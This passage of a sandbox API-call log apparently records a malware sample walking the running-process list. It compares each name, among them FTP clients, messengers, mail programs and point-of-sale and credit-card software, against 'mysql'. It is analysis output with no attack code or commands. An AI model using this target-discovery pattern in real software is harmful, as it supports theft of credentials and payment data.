(in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0091.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0091.804] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3547758 [0091.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x3547758, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0091.804] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0091.805] StrStrIA (lpFirst="icq.exe", lpSrch="mysql") returned 0x0 [0091.805] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0091.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.806] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3541970 [0091.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x3541970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0091.806] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0091.806] StrStrIA (lpFirst="leechftp.exe", lpSrch="mysql") returned 0x0 [0091.807] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0091.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.808] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35419a0 [0091.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x35419a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0091.808] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0091.808] StrStrIA (lpFirst="ncftp.exe", lpSrch="mysql") returned 0x0 [0091.808] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0091.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.809] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35419b8 [0091.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x35419b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0091.810] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0091.810] StrStrIA (lpFirst="notepad.exe", lpSrch="mysql") returned 0x0 [0091.810] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0091.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0091.811] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3541a30 [0091.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x3541a30, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0091.811] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0091.811] StrStrIA (lpFirst="operamail.exe", lpSrch="mysql") returned 0x0 [0091.811] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0091.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.813] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3541b08 [0091.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x3541b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0091.813] lstrcpyA (in: lpString1=0x567fabc, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0091.813] StrStrIA (lpFirst="outlook.exe", lpSrch="mysql") returned 0x0 [0091.813] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0091.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0091.814] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3541b20 [0091.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3541b20, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0091.815] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0091.815] StrStrIA (lpFirst="pidgin.exe", lpSrch="mysql") returned 0x0 [0091.815] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0091.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0091.816] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3542010 [0091.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3542010, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0091.817] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0091.817] StrStrIA (lpFirst="scriptftp.exe", lpSrch="mysql") returned 0x0 [0091.817] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0091.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.818] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3541f80 [0091.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3541f80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0091.818] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0091.818] StrStrIA (lpFirst="skype.exe", lpSrch="mysql") returned 0x0 [0091.818] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0091.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.819] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3541fe0 [0091.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x3541fe0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0091.819] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0091.819] StrStrIA (lpFirst="smartftp.exe", lpSrch="mysql") returned 0x0 [0091.819] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0091.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0091.821] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3542028 [0091.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x3542028, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0091.821] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0091.821] StrStrIA (lpFirst="thunderbird.exe", lpSrch="mysql") returned 0x0 [0091.821] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0091.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.822] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3542040 [0091.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x3542040, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0091.822] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0091.822] StrStrIA (lpFirst="totalcmd.exe", lpSrch="mysql") returned 0x0 [0091.822] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0091.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.824] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3541ed8 [0091.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3541ed8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0091.824] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0091.824] StrStrIA (lpFirst="trillian.exe", lpSrch="mysql") returned 0x0 [0091.824] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0091.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.825] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3541dd0 [0091.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x3541dd0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0091.825] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0091.825] StrStrIA (lpFirst="webdrive.exe", lpSrch="mysql") returned 0x0 [0091.825] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0091.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.826] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3541f08 [0091.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x3541f08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0091.826] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0091.827] StrStrIA (lpFirst="whatsapp.exe", lpSrch="mysql") returned 0x0 [0091.827] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0091.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0091.828] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3541ff8 [0091.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x3541ff8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0091.828] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0091.828] StrStrIA (lpFirst="winscp.exe", lpSrch="mysql") returned 0x0 [0091.828] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0091.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0091.829] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x355b898 [0091.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x355b898, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0091.829] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0091.829] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="mysql") returned 0x0 [0091.829] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0091.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0091.831] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x355b8f8 [0091.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x355b8f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0091.831] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0091.833] StrStrIA (lpFirst="active-charge.exe", lpSrch="mysql") returned 0x0 [0091.833] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0091.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.834] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3541e18 [0091.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x3541e18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0091.834] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0091.834] StrStrIA (lpFirst="accupos.exe", lpSrch="mysql") returned 0x0 [0091.834] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0091.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.836] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3541e78 [0091.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3541e78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0091.836] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0091.836] StrStrIA (lpFirst="afr38.exe", lpSrch="mysql") returned 0x0 [0091.836] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0091.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0091.837] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3541e60 [0091.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3541e60, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0091.837] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0091.837] StrStrIA (lpFirst="aldelo.exe", lpSrch="mysql") returned 0x0 [0091.837] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0091.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0091.838] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x3541da0 [0091.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x3541da0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0091.839] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0091.839] StrStrIA (lpFirst="ccv_server.exe", lpSrch="mysql") returned 0x0 [0091.839] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0091.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0091.840] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x355b918 [0091.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x355b918, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0091.840] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0091.840] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="mysql") returned 0x0 [0091.840] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, 